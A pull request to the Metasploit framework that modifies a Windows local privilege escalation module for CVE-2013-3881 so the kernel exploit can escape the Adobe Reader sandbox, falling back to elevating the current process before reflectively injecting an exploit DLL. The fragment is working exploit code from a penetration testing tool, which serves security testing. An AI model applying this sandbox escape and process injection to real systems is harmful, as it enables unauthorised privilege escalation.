### PR TITLE
Allow cve-2013-3881 to bypass reader sandbox

### DIFF
--- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
@@ -101,12 +101,13 @@ class Metasploit3 < Msf::Exploit::Local
     notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
     begin
       process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
     rescue Rex::Post::Meterpreter::RequestError
       # Reader Sandbox won't allow to create a new process:
       # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status("Operation failed. Trying to elevate the current process...")
       process = client.sys.process.open
     end
-    print_good("Process #{process.pid} launched.")
 
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     library_path = ::File.join(Msf::Config.data_directory, "exploits",


### PR DESCRIPTION
Hi @zeroSteiner,  this pull request just makes the filename not so generic, and allows the exploit to try to elevate the current process, if creating a notepad.exe process fail. 

While Protecting Mode on IE will allow you to create a process other sandboxes, like the reader one, won't allow you to create a new process. It's sad to lose a so awesome work :) since this kernel exploit will allow you to bypass sandbox on Reader :)

Hope it has sense for you! Feel free to check test and land and https://github.com/rapid7/metasploit-framework/pull/2957 will be automatically updated :)

thanks! awesome work! O_O
